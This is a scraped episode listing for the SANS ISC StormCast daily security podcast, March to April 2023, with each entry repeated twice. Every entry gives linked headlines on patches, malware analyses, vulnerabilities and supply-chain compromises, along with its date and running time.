Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20April%202023%20Patch%20Tuesday/29736 Windows LAPS Available as part of Windows https://techcommunity.microsoft.com/t5/windows-it-pro-blog/by-popular-demand-windows-laps-available-now/ba-p/3788747 SAP Patches https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Adobe Patches https://helpx.adobe.com/security/security-bulletin.html
4/12/20236 minutes, 3 seconds
Episode Artwork

ISC StormCast for Wednesday, April 12th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20April%202023%20Patch%20Tuesday/29736 Windows LAPS Available as part of Windows https://techcommunity.microsoft.com/t5/windows-it-pro-blog/by-popular-demand-windows-laps-available-now/ba-p/3788747 SAP Patches https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Adobe Patches https://helpx.adobe.com/security/security-bulletin.html
4/12/20236 minutes, 3 seconds
Episode Artwork

ISC StormCast for Tuesday, April 11th, 2023

Another Malicious HTA File Analysis - Part 2 https://isc.sans.edu/diary/Another%20Malicious%20HTA%20File%20Analysis%20-%20Part%202/29676 Apple Updates for Older Operating Systems https://support.apple.com/en-us/HT201222 MSI Attack May Affect BIOS Updates https://www.msi.com/news/detail/MSI-Statement-141688 KB5021130: How to manage the Netlogon protocol changes related to CVE-2022-38023 https://support.microsoft.com/en-us/topic/kb5021130-how-to-manage-the-netlogon-protocol-changes-related-to-cve-2022-38023-46ea3067-3989-4d40-963c-680fd9e8ee25
4/11/20235 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, April 11th, 2023

Another Malicious HTA File Analysis - Part 2 https://isc.sans.edu/diary/Another%20Malicious%20HTA%20File%20Analysis%20-%20Part%202/29676 Apple Updates for Older Operating Systems https://support.apple.com/en-us/HT201222 MSI Attack May Affect BIOS Updates https://www.msi.com/news/detail/MSI-Statement-141688 KB5021130: How to manage the Netlogon protocol changes related to CVE-2022-38023 https://support.microsoft.com/en-us/topic/kb5021130-how-to-manage-the-netlogon-protocol-changes-related-to-cve-2022-38023-46ea3067-3989-4d40-963c-680fd9e8ee25
4/11/20235 minutes, 39 seconds
Episode Artwork

ISC StormCast for Monday, April 10th, 2023

Detecting Suspicious API Usage with YARA Rules https://isc.sans.edu/diary/Detecting%20Suspicious%20API%20Usage%20with%20YARA%20Rules/29724 Apple Patching Two 0-Day Vulnerabilities in iOS and macOS https://isc.sans.edu/diary/Apple%20Patching%20Two%200-Day%20Vulnerabilities%20in%20iOS%20and%20macOS/29726 VM2 Sandbox Escape https://github.com/patriksimek/vm2/security/advisories/GHSA-7jxr-cg7f-gpgv https://gist.github.com/seongil-wi/2a44e082001b959bfe304b62121fb76d Microsoft Netlogon: Potential Upcoming Impacts of CVE-2022-38023 https://isc.sans.edu/diary/Microsoft%20Netlogon%3A%20Potential%20Upcoming%20Impacts%20of%20CVE-2022-38023/29728
4/10/20236 minutes, 55 seconds
Episode Artwork

ISC StormCast for Monday, April 10th, 2023

Detecting Suspicious API Usage with YARA Rules https://isc.sans.edu/diary/Detecting%20Suspicious%20API%20Usage%20with%20YARA%20Rules/29724 Apple Patching Two 0-Day Vulnerabilities in iOS and macOS https://isc.sans.edu/diary/Apple%20Patching%20Two%200-Day%20Vulnerabilities%20in%20iOS%20and%20macOS/29726 VM2 Sandbox Escape https://github.com/patriksimek/vm2/security/advisories/GHSA-7jxr-cg7f-gpgv https://gist.github.com/seongil-wi/2a44e082001b959bfe304b62121fb76d Microsoft Netlogon: Potential Upcoming Impacts of CVE-2022-38023 https://isc.sans.edu/diary/Microsoft%20Netlogon%3A%20Potential%20Upcoming%20Impacts%20of%20CVE-2022-38023/29728
4/10/20236 minutes, 55 seconds
Episode Artwork

ISC StormCast for Friday, April 7th, 2023

Self Extracting Archives https://www.crowdstrike.com/blog/self-extracting-archives-decoy-files-and-their-hidden-payloads/ loldrivers https://www.loldrivers.io Trellix Privilege Escalation https://kcm.trellix.com/corporate/index?page=content&id=SB10396 HP LaserJet Vuln. https://support.hp.com/us-en/document/ish_7905330-7905358-16/hpsbpi03838
4/7/20236 minutes, 37 seconds
Episode Artwork

ISC StormCast for Friday, April 7th, 2023

Self Extracting Archives https://www.crowdstrike.com/blog/self-extracting-archives-decoy-files-and-their-hidden-payloads/ loldrivers https://www.loldrivers.io Trellix Privilege Escalation https://kcm.trellix.com/corporate/index?page=content&id=SB10396 HP LaserJet Vuln. https://support.hp.com/us-en/document/ish_7905330-7905358-16/hpsbpi03838
4/7/20236 minutes, 37 seconds
Episode Artwork

ISC StormCast for Thursday, April 6th, 2023

Exploration of DShield Cowrie Data with jq https://isc.sans.edu/diary/Exploration%20of%20DShield%20Cowrie%20Data%20with%20jq/29714 NEXX Garage Door Vulnerability https://medium.com/@samsabetan/the-uninvited-guest-idors-garage-doors-and-stolen-secrets-e4b49e02dadc OneNote Changes https://learn.microsoft.com/en-us/deployoffice/security/onenote-extension-block MSFT Changes to Auto-Update https://learn.microsoft.com/en-us/windows/release-health/windows-message-center#3060 NPM Spam DDoS Attacks https://www.helpnetsecurity.com/2023/04/05/flood-of-malicious-packages-results-in-npm-registry-dos/
4/6/20236 minutes, 52 seconds
Episode Artwork

ISC StormCast for Thursday, April 6th, 2023

Exploration of DShield Cowrie Data with jq https://isc.sans.edu/diary/Exploration%20of%20DShield%20Cowrie%20Data%20with%20jq/29714 NEXX Garage Door Vulnerability https://medium.com/@samsabetan/the-uninvited-guest-idors-garage-doors-and-stolen-secrets-e4b49e02dadc OneNote Changes https://learn.microsoft.com/en-us/deployoffice/security/onenote-extension-block MSFT Changes to Auto-Update https://learn.microsoft.com/en-us/windows/release-health/windows-message-center#3060 NPM Spam DDoS Attacks https://www.helpnetsecurity.com/2023/04/05/flood-of-malicious-packages-results-in-npm-registry-dos/
4/6/20236 minutes, 52 seconds
Episode Artwork

ISC StormCast for Wednesday, April 5th, 2023

Analyzing the efile.com Malware https://isc.sans.edu/diary/Analyzing+the+efilecom+Malware+efail/29712 ALPHV Ransomware Targets Backup Installations https://www.mandiant.com/resources/blog/alphv-ransomware-backup Sophos Web Appliance Vulnerability (and EoL) https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce Zimbra Exploited in Targeted Attacks https://www.proofpoint.com/us/blog/threat-insight/exploitation-dish-best-served-cold-winter-vivern-uses-known-zimbra-vulnerability
4/5/20236 minutes, 18 seconds
Episode Artwork

ISC StormCast for Wednesday, April 5th, 2023

Analyzing the efile.com Malware https://isc.sans.edu/diary/Analyzing+the+efilecom+Malware+efail/29712 ALPHV Ransomware Targets Backup Installations https://www.mandiant.com/resources/blog/alphv-ransomware-backup Sophos Web Appliance Vulnerability (and EoL) https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce Zimbra Exploited in Targeted Attacks https://www.proofpoint.com/us/blog/threat-insight/exploitation-dish-best-served-cold-winter-vivern-uses-known-zimbra-vulnerability
4/5/20236 minutes, 18 seconds
Episode Artwork

ISC StormCast for Tuesday, April 4th, 2023

efile.com compromise https://isc.sans.edu/forums/diary/Supply%20Chain%20Compromise%20or%20False%20Positive%3A%20The%20Intriguing%20Case%20of%20efile.com%20%5Bupdated%20-%20confirmed%20malicious%20code%5D/29708/ Western Digital MyCloud Breach https://www.bleepingcomputer.com/news/security/western-digital-discloses-network-breach-my-cloud-service-down/ 3CX Compromise Affected Cryptocoin Exchanges https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/
4/4/20237 minutes, 46 seconds
Episode Artwork

ISC StormCast for Tuesday, April 4th, 2023

efile.com compromise https://isc.sans.edu/forums/diary/Supply%20Chain%20Compromise%20or%20False%20Positive%3A%20The%20Intriguing%20Case%20of%20efile.com%20%5Bupdated%20-%20confirmed%20malicious%20code%5D/29708/ Western Digital MyCloud Breach https://www.bleepingcomputer.com/news/security/western-digital-discloses-network-breach-my-cloud-service-down/ 3CX Compromise Affected Cryptocoin Exchanges https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/
4/4/20237 minutes, 46 seconds
Episode Artwork

ISC StormCast for Monday, April 3rd, 2023

Use of X-Frame-Options and CSP frame-ancestors security headers https://isc.sans.edu/diary/Use%20of%20X-Frame-Options%20and%20CSP%20frame-ancestors%20security%20headers%20on%201%20million%20most%20popular%20domains/29698 oledump supporting MSI Files https://isc.sans.edu/diary/Update+oledump+MSI+Files/29700/ 3CX Update https://www.3cx.com/blog/news/chrome-blocks-latest-msi/ PinDuoDuo App shows anomalous behaviour https://edition.cnn.com/2023/04/02/tech/china-pinduoduo-malware-cybersecurity-analysis-intl-hnk/index.html
4/3/20235 minutes, 57 seconds
Episode Artwork

ISC StormCast for Monday, April 3rd, 2023

Use of X-Frame-Options and CSP frame-ancestors security headers https://isc.sans.edu/diary/Use%20of%20X-Frame-Options%20and%20CSP%20frame-ancestors%20security%20headers%20on%201%20million%20most%20popular%20domains/29698 oledump supporting MSI Files https://isc.sans.edu/diary/Update+oledump+MSI+Files/29700/ 3CX Update https://www.3cx.com/blog/news/chrome-blocks-latest-msi/ PinDuoDuo App shows anomalous behaviour https://edition.cnn.com/2023/04/02/tech/china-pinduoduo-malware-cybersecurity-analysis-intl-hnk/index.html
4/3/20235 minutes, 57 seconds
Episode Artwork

ISC StormCast for Friday, March 31st, 2023

Malicious 3CX Dekstop App Update Lifestream (Friday March 31st 1400 ET, 1800 UTC) https://www.youtube.com/watch?v=cCf3Km_j5bY 3CX Update: https://www.3cx.com/blog/news/desktopapp-security-alert/ SentinelOne: https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/ Objective-See Blog Post: https://objective-see.org/blog/blog_0x73.html Crowdstrike: https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/ Bypassing PowerShell Strong Obfuscation https://isc.sans.edu/diary/Bypassing%20PowerShell%20Strong%20Obfuscation/29692
3/31/20236 minutes, 10 seconds
Episode Artwork

ISC StormCast for Friday, March 31st, 2023

Malicious 3CX Dekstop App Update Lifestream (Friday March 31st 1400 ET, 1800 UTC) https://www.youtube.com/watch?v=cCf3Km_j5bY 3CX Update: https://www.3cx.com/blog/news/desktopapp-security-alert/ SentinelOne: https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/ Objective-See Blog Post: https://objective-see.org/blog/blog_0x73.html Crowdstrike: https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/ Bypassing PowerShell Strong Obfuscation https://isc.sans.edu/diary/Bypassing%20PowerShell%20Strong%20Obfuscation/29692
3/31/20236 minutes, 10 seconds
Episode Artwork

ISC StormCast for Thursday, March 30th, 2023

Extracting Multiple Streams From OLE Files https://isc.sans.edu/diary/Extracting%20Multiple%20Streams%20From%20OLE%20Files/29688 3CXDesktop App Compromise https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/ Microsoft Defender False Positives https://twitter.com/MSFT365Status/status/1641048649525260289 https://admin.microsoft.com/Adminportal/Home?ref=/servicehealth/:/alerts/DZ534539 (requires login) Active Exploitation of IBM Aspera Faspex CVE-2022-47986 https://www.rapid7.com/blog/post/2023/03/28/etr-active-exploitation-of-ibm-aspera-faspex-cve-2022-47986/ QNAP Patch for sudo vulnerablity https://www.qnap.com/en/security-advisory/qsa-23-11
3/30/20235 minutes, 29 seconds
Episode Artwork

ISC StormCast for Thursday, March 30th, 2023

Extracting Multiple Streams From OLE Files https://isc.sans.edu/diary/Extracting%20Multiple%20Streams%20From%20OLE%20Files/29688 3CXDesktop App Compromise https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/ Microsoft Defender False Positives https://twitter.com/MSFT365Status/status/1641048649525260289 https://admin.microsoft.com/Adminportal/Home?ref=/servicehealth/:/alerts/DZ534539 (requires login) Active Exploitation of IBM Aspera Faspex CVE-2022-47986 https://www.rapid7.com/blog/post/2023/03/28/etr-active-exploitation-of-ibm-aspera-faspex-cve-2022-47986/ QNAP Patch for sudo vulnerablity https://www.qnap.com/en/security-advisory/qsa-23-11
3/30/20235 minutes, 29 seconds
Episode Artwork

ISC StormCast for Wednesday, March 29th, 2023

Network Data Collector Placement Makes a Difference https://isc.sans.edu/diary/Network%20Data%20Collector%20Placement%20Makes%20a%20Difference/29664 Throttling and Blocking Email from Persistently Vulnerable Exchange Servers to Exchange Online https://techcommunity.microsoft.com/t5/exchange-team-blog/throttling-and-blocking-email-from-persistently-vulnerable/ba-p/3762078 Bypassing Wi-Fi Encryption by Manipulating Transmit Queues https://papers.mathyvanhoef.com/usenix2023-wifi.pdf
3/29/20235 minutes, 17 seconds
Episode Artwork

ISC StormCast for Wednesday, March 29th, 2023

Network Data Collector Placement Makes a Difference https://isc.sans.edu/diary/Network%20Data%20Collector%20Placement%20Makes%20a%20Difference/29664 Throttling and Blocking Email from Persistently Vulnerable Exchange Servers to Exchange Online https://techcommunity.microsoft.com/t5/exchange-team-blog/throttling-and-blocking-email-from-persistently-vulnerable/ba-p/3762078 Bypassing Wi-Fi Encryption by Manipulating Transmit Queues https://papers.mathyvanhoef.com/usenix2023-wifi.pdf
3/29/20235 minutes, 17 seconds
Episode Artwork

ISC StormCast for Tuesday, March 28th, 2023

Another Malicious HTA File Analysis Part 1 https://isc.sans.edu/diary/Another%20Malicious%20HTA%20File%20Analysis%20-%20Part%201/29674 Apple Updates Everything https://isc.sans.edu/diary/Apple%20Updates%20Everything%20%28including%20Studio%20Display%29/29682 MacStealer Malware Exfiltrates Mac Secrets https://www.uptycs.com/blog/macstealer-command-and-control-c2-malware
3/28/20235 minutes, 13 seconds
Episode Artwork

ISC StormCast for Tuesday, March 28th, 2023

Another Malicious HTA File Analysis Part 1 https://isc.sans.edu/diary/Another%20Malicious%20HTA%20File%20Analysis%20-%20Part%201/29674 Apple Updates Everything https://isc.sans.edu/diary/Apple%20Updates%20Everything%20%28including%20Studio%20Display%29/29682 MacStealer Malware Exfiltrates Mac Secrets https://www.uptycs.com/blog/macstealer-command-and-control-c2-malware
3/28/20235 minutes, 13 seconds
Episode Artwork

ISC StormCast for Monday, March 27th, 2023

Update for Windows Snipping Tool https://isc.sans.edu/diary/Microsoft%20Released%20an%20Update%20for%20Windows%20Snipping%20Tool%20Vulnerability/29670 GitHub Rotates SSH Keys https://github.blog/2023-03-23-we-updated-our-rsa-ssh-host-key/ redis-py vulnerability leads to mixed up sessions, affects ChatGPT https://openai.com/blog/march-20-chatgpt-outage Linux Tech Tips YouTube Hack https://www.theverge.com/2023/3/23/23653115/linus-tech-tips-youtube-hack-crypto-scam https://isc.sans.edu/diary/Elon%20Musk%20Themed%20Crypto%20Scams%20Flooding%20YouTube%20Today/29434 CyberChef Update https://github.com/gchq/CyberChef/wiki/Character-encoding,-EOL-separators,-and-editor-features
3/27/20234 minutes, 59 seconds
Episode Artwork

ISC StormCast for Monday, March 27th, 2023

Update for Windows Snipping Tool https://isc.sans.edu/diary/Microsoft%20Released%20an%20Update%20for%20Windows%20Snipping%20Tool%20Vulnerability/29670 GitHub Rotates SSH Keys https://github.blog/2023-03-23-we-updated-our-rsa-ssh-host-key/ redis-py vulnerability leads to mixed up sessions, affects ChatGPT https://openai.com/blog/march-20-chatgpt-outage Linux Tech Tips YouTube Hack https://www.theverge.com/2023/3/23/23653115/linus-tech-tips-youtube-hack-crypto-scam https://isc.sans.edu/diary/Elon%20Musk%20Themed%20Crypto%20Scams%20Flooding%20YouTube%20Today/29434 CyberChef Update https://github.com/gchq/CyberChef/wiki/Character-encoding,-EOL-separators,-and-editor-features
3/27/20234 minutes, 59 seconds
Episode Artwork

ISC StormCast for Friday, March 24th, 2023

Cropping and Redacting Images Safely https://isc.sans.edu/diary/Cropping%20and%20Redacting%20Images%20Safely/29666 Untitled Goose Tool https://github.com/cisagov/untitledgoosetool Veeam Vulnerability Details https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive/ Unicode Support in Python used to Evade Detection https://blog.phylum.io/malicious-actors-use-unicode-support-in-python-to-evade-detection
3/24/20235 minutes, 39 seconds
Episode Artwork

ISC StormCast for Friday, March 24th, 2023

Cropping and Redacting Images Safely https://isc.sans.edu/diary/Cropping%20and%20Redacting%20Images%20Safely/29666 Untitled Goose Tool https://github.com/cisagov/untitledgoosetool Veeam Vulnerability Details https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive/ Unicode Support in Python used to Evade Detection https://blog.phylum.io/malicious-actors-use-unicode-support-in-python-to-evade-detection
3/24/20235 minutes, 39 seconds
Episode Artwork

ISC StormCast for Thursday, March 23rd, 2023

Windows Snipping Tool Privacy Bug: Inspecting PNG Files https://isc.sans.edu/diary/Windows%2011%20Snipping%20Tool%20Privacy%20Bug%3A%20Inspecting%20PNG%20Files/29660 Acropalypse Detection and Sanitization Tools https://github.com/infobyte/CVE-2023-21036 WooCommerce Skimmer Reveals Tampered Gateway Plugin https://blog.sucuri.net/2023/03/woocommerce-skimmer-reveals-tampered-gateway-plugin.html Netgear Orbi Router Vulnerable https://blog.talosintelligence.com/vulnerability-spotlight-netgear-orbi-router-vulnerable-to-arbitrary-command-execution/
3/23/20235 minutes, 43 seconds
Episode Artwork

ISC StormCast for Thursday, March 23rd, 2023

Windows Snipping Tool Privacy Bug: Inspecting PNG Files https://isc.sans.edu/diary/Windows%2011%20Snipping%20Tool%20Privacy%20Bug%3A%20Inspecting%20PNG%20Files/29660 Acropalypse Detection and Sanitization Tools https://github.com/infobyte/CVE-2023-21036 WooCommerce Skimmer Reveals Tampered Gateway Plugin https://blog.sucuri.net/2023/03/woocommerce-skimmer-reveals-tampered-gateway-plugin.html Netgear Orbi Router Vulnerable https://blog.talosintelligence.com/vulnerability-spotlight-netgear-orbi-router-vulnerable-to-arbitrary-command-execution/
3/23/20235 minutes, 43 seconds
Episode Artwork

ISC StormCast for Wednesday, March 22nd, 2023

String Obfuscation: Character Pair Reversal https://isc.sans.edu/diary/String%20Obfuscation%3A%20Character%20Pair%20Reversal/29654 Windows 11 Snipping Tool Privacy Bug https://www.bleepingcomputer.com/news/microsoft/windows-11-snipping-tool-privacy-bug-exposes-cropped-image-content/ Malicious .Net Packages https://jfrog.com/blog/attackers-are-starting-to-target-net-developers-with-malicious-code-nuget-packages/ Spring Framework Vulnerability https://spring.io/blog/2023/03/20/spring-framework-6-0-7-and-5-3-26-fix-cve-2023-20860-and-cve-2023-20861 Snappy Vulnerability https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc
3/22/20235 minutes, 54 seconds
Episode Artwork

ISC StormCast for Wednesday, March 22nd, 2023

String Obfuscation: Character Pair Reversal https://isc.sans.edu/diary/String%20Obfuscation%3A%20Character%20Pair%20Reversal/29654 Windows 11 Snipping Tool Privacy Bug https://www.bleepingcomputer.com/news/microsoft/windows-11-snipping-tool-privacy-bug-exposes-cropped-image-content/ Malicious .Net Packages https://jfrog.com/blog/attackers-are-starting-to-target-net-developers-with-malicious-code-nuget-packages/ Spring Framework Vulnerability https://spring.io/blog/2023/03/20/spring-framework-6-0-7-and-5-3-26-fix-cve-2023-20860-and-cve-2023-20861 Snappy Vulnerability https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc
3/22/20235 minutes, 54 seconds
Episode Artwork

ISC StormCast for Tuesday, March 21st, 2023

From Phishing Kit to Telegram ... or Not https://isc.sans.edu/diary/From%20Phishing%20Kit%20To%20Telegram...%20or%20Not!/29650 Emotet uses OneNote https://cofense.com/blog/emotet-sending-malicious-emails-after-three-month-hiatus/ WSUS Update https://learn.microsoft.com/en-us/windows-server/administration/windows-server-update-services/plan/plan-your-wsus-deployment#uup-considerations DOTRUNPEX .Net Injector https://research.checkpoint.com/2023/dotrunpex-demystifying-new-virtualized-net-injector-used-in-the-wild/
3/21/20235 minutes, 11 seconds
Episode Artwork

ISC StormCast for Tuesday, March 21st, 2023

From Phishing Kit to Telegram ... or Not https://isc.sans.edu/diary/From%20Phishing%20Kit%20To%20Telegram...%20or%20Not!/29650 Emotet uses OneNote https://cofense.com/blog/emotet-sending-malicious-emails-after-three-month-hiatus/ WSUS Update https://learn.microsoft.com/en-us/windows-server/administration/windows-server-update-services/plan/plan-your-wsus-deployment#uup-considerations DOTRUNPEX .Net Injector https://research.checkpoint.com/2023/dotrunpex-demystifying-new-virtualized-net-injector-used-in-the-wild/
3/21/20235 minutes, 11 seconds
Episode Artwork

ISC StormCast for Monday, March 20th, 2023

Old Backdoor, New Obfuscation https://isc.sans.edu/diary/Old%20Backdoor%2C%20New%20Obfuscation/29646 Samsung Exynos Chip Vulnerability https://googleprojectzero.blogspot.com/2023/03/multiple-internet-to-baseband-remote-rce.html Android Image Cropping Problem https://twitter.com/ItsSimonTime/status/1636857478263750656/photo/1 https://acropalypse.app/ Bitwarden Pins https://ambiso.github.io/bitwarden-pin/
3/20/20236 minutes, 47 seconds
Episode Artwork

ISC StormCast for Monday, March 20th, 2023

Old Backdoor, New Obfuscation https://isc.sans.edu/diary/Old%20Backdoor%2C%20New%20Obfuscation/29646 Samsung Exynos Chip Vulnerability https://googleprojectzero.blogspot.com/2023/03/multiple-internet-to-baseband-remote-rce.html Android Image Cropping Problem https://twitter.com/ItsSimonTime/status/1636857478263750656/photo/1 https://acropalypse.app/ Bitwarden Pins https://ambiso.github.io/bitwarden-pin/
3/20/20236 minutes, 47 seconds
Episode Artwork

ISC StormCast for Friday, March 17th, 2023

Simple Shellcode Dissection https://isc.sans.edu/diary/Simple%20Shellcode%20Dissection/29642 Threat Actors Exploit Progress Telerik Vulnerablity https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-074a Abusing Adobe Acrobat Sign to Distribute Malware https://blog.avast.com/adobe-acrobat-sign-malware Zoom Patches https://explore.zoom.us/en/trust/security/security-bulletin/ Array Networks Advisory https://support.arraynetworks.net/prx/001/http/supportportal.arraynetworks.net/documentation/FieldNotice/Array_Networks_Security_Advisory_for_Remote_Code_Execution_Vulnerability_AG.pdf Aruba Patches https://www.arubanetworks.com/support-services/security-bulletins/
3/17/20237 minutes, 12 seconds
Episode Artwork

ISC StormCast for Friday, March 17th, 2023

Simple Shellcode Dissection https://isc.sans.edu/diary/Simple%20Shellcode%20Dissection/29642 Threat Actors Exploit Progress Telerik Vulnerablity https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-074a Abusing Adobe Acrobat Sign to Distribute Malware https://blog.avast.com/adobe-acrobat-sign-malware Zoom Patches https://explore.zoom.us/en/trust/security/security-bulletin/ Array Networks Advisory https://support.arraynetworks.net/prx/001/http/supportportal.arraynetworks.net/documentation/FieldNotice/Array_Networks_Security_Advisory_for_Remote_Code_Execution_Vulnerability_AG.pdf Aruba Patches https://www.arubanetworks.com/support-services/security-bulletins/
3/17/20237 minutes, 12 seconds
Episode Artwork

ISC StormCast for Thursday, March 16th, 2023

IPFS Phishing and the need for correctly set HTTP security headers https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638 Exploiting CVE-2023-23397: Microsoft Outlook Elevation of Privilege Vulnerability https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/ CVE-2023-23415 ICMP RCE https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23415 Chromium Certificate Proposals https://www.chromium.org/Home/chromium-security/root-ca-policy/moving-forward-together/
3/16/20236 minutes, 36 seconds
Episode Artwork

ISC StormCast for Thursday, March 16th, 2023

IPFS Phishing and the need for correctly set HTTP security headers https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638 Exploiting CVE-2023-23397: Microsoft Outlook Elevation of Privilege Vulnerability https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/ CVE-2023-23415 ICMP RCE https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23415 Chromium Certificate Proposals https://www.chromium.org/Home/chromium-security/root-ca-policy/moving-forward-together/
3/16/20236 minutes, 36 seconds
Episode Artwork

ISC StormCast for Wednesday, March 15th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20March%202023%20Patch%20Tuesday/29634 Adobe Cold Fusion and Magento (Adobe Commerce) patches https://helpx.adobe.com/security/products/magento/apsb23-17.html https://helpx.adobe.com/security/products/coldfusion/apsb23-25.html SAP Patches https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Firefox Patches https://www.mozilla.org/en-US/security/advisories/mfsa2023-09/
3/15/20236 minutes, 25 seconds
Episode Artwork

ISC StormCast for Wednesday, March 15th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20March%202023%20Patch%20Tuesday/29634 Adobe Cold Fusion and Magento (Adobe Commerce) patches https://helpx.adobe.com/security/products/magento/apsb23-17.html https://helpx.adobe.com/security/products/coldfusion/apsb23-25.html SAP Patches https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Firefox Patches https://www.mozilla.org/en-US/security/advisories/mfsa2023-09/
3/15/20236 minutes, 25 seconds
Episode Artwork

ISC StormCast for Tuesday, March 14th, 2023

SVB Scams and New Domain Registrations https://isc.sans.edu/diary/Incoming%20Silicon%20Valley%20Bank%20Related%20Scams/29630 CISA Adds Older PLEX and VMWare Vulnerablities to Known-Exploited List https://www.bleepingcomputer.com/news/security/cisa-warns-of-actively-exploited-plex-bug-after-lastpass-breach/ FortiOS Vulnerability Exploited https://www.fortiguard.com/psirt/FG-IR-22-369
3/14/20235 minutes, 18 seconds
Episode Artwork

ISC StormCast for Tuesday, March 14th, 2023

SVB Scams and New Domain Registrations https://isc.sans.edu/diary/Incoming%20Silicon%20Valley%20Bank%20Related%20Scams/29630 CISA Adds Older PLEX and VMWare Vulnerablities to Known-Exploited List https://www.bleepingcomputer.com/news/security/cisa-warns-of-actively-exploited-plex-bug-after-lastpass-breach/ FortiOS Vulnerability Exploited https://www.fortiguard.com/psirt/FG-IR-22-369
3/14/20235 minutes, 18 seconds
Episode Artwork

ISC StormCast for Monday, March 13th, 2023

AsynRAT Trojan - Bill Payment (Pago de la factura) https://isc.sans.edu/diary/AsynRAT+Trojan+Bill+Payment+Pago+de+la+factura/29626 Mirai Payload Generator https://isc.sans.edu/diary/Overview%20of%20a%20Mirai%20Payload%20Generator/29624 Multi-Technology Script Leading to Browser Hijacking https://isc.sans.edu/diary/Multi-Technology%20Script%20Leading%20to%20Browser%20Hijacking/29620 OneNote will warn users of embeded content https://www.microsoft.com/en-us/microsoft-365/roadmap?filters=OneNote%2CIn%20development&searchterms=122277 Google Removing Chrome Cleanup Tool https://security.googleblog.com/2023/03/thank-you-and-goodbye-to-chrome-cleanup.html
3/13/20235 minutes, 41 seconds
Episode Artwork

ISC StormCast for Monday, March 13th, 2023

AsynRAT Trojan - Bill Payment (Pago de la factura) https://isc.sans.edu/diary/AsynRAT+Trojan+Bill+Payment+Pago+de+la+factura/29626 Mirai Payload Generator https://isc.sans.edu/diary/Overview%20of%20a%20Mirai%20Payload%20Generator/29624 Multi-Technology Script Leading to Browser Hijacking https://isc.sans.edu/diary/Multi-Technology%20Script%20Leading%20to%20Browser%20Hijacking/29620 OneNote will warn users of embeded content https://www.microsoft.com/en-us/microsoft-365/roadmap?filters=OneNote%2CIn%20development&searchterms=122277 Google Removing Chrome Cleanup Tool https://security.googleblog.com/2023/03/thank-you-and-goodbye-to-chrome-cleanup.html
3/13/20235 minutes, 41 seconds
Episode Artwork

ISC StormCast for Friday, March 10th, 2023

Suspected Chinese Campaign to Persist on SonicWall Devices https://www.mandiant.com/resources/blog/suspected-chinese-persist-sonicwall Old Cyber Gang Uses New Crypted - ScrubCrypt https://www.fortinet.com/blog/threat-research/old-cyber-gang-uses-new-crypter-scrubcrypt Home Assistant Supervisor Security Vulnerability https://www.home-assistant.io/blog/2023/03/08/supervisor-security-disclosure/ Fake ChatGPT Chrome Extensions https://www.helpnetsecurity.com/2023/03/09/fake-chatgpt-extension/ Criminals Steal Crytocurrency through Play-to-Earn Games https://www.ic3.gov/Media/Y2023/PSA230309
3/10/20236 minutes, 23 seconds
Episode Artwork

ISC StormCast for Friday, March 10th, 2023

Suspected Chinese Campaign to Persist on SonicWall Devices https://www.mandiant.com/resources/blog/suspected-chinese-persist-sonicwall Old Cyber Gang Uses New Crypted - ScrubCrypt https://www.fortinet.com/blog/threat-research/old-cyber-gang-uses-new-crypter-scrubcrypt Home Assistant Supervisor Security Vulnerability https://www.home-assistant.io/blog/2023/03/08/supervisor-security-disclosure/ Fake ChatGPT Chrome Extensions https://www.helpnetsecurity.com/2023/03/09/fake-chatgpt-extension/ Criminals Steal Crytocurrency through Play-to-Earn Games https://www.ic3.gov/Media/Y2023/PSA230309
3/10/20236 minutes, 23 seconds
Episode Artwork

ISC StormCast for Thursday, March 9th, 2023

Increase in exploits against Joomla (CVE-2023-23752) https://isc.sans.edu/diary/Increase%20in%20exploits%20agains%20Joomla%20%28CVE-2023-23752%29/29614 Jenkins RCE Vulnerability https://blog.aquasec.com/jenkins-server-vulnerabilities Bitwarden: The Curious Use-Case of Password Pilfering https://flashpoint.io/blog/bitwarden-password-pilfering/ FortiOS Vulnerabilities https://www.fortiguard.com/psirt/FG-IR-23-001 Veeam Backup Vulnerabilities https://www.veeam.com/kb4245
3/9/20236 minutes, 23 seconds
Episode Artwork

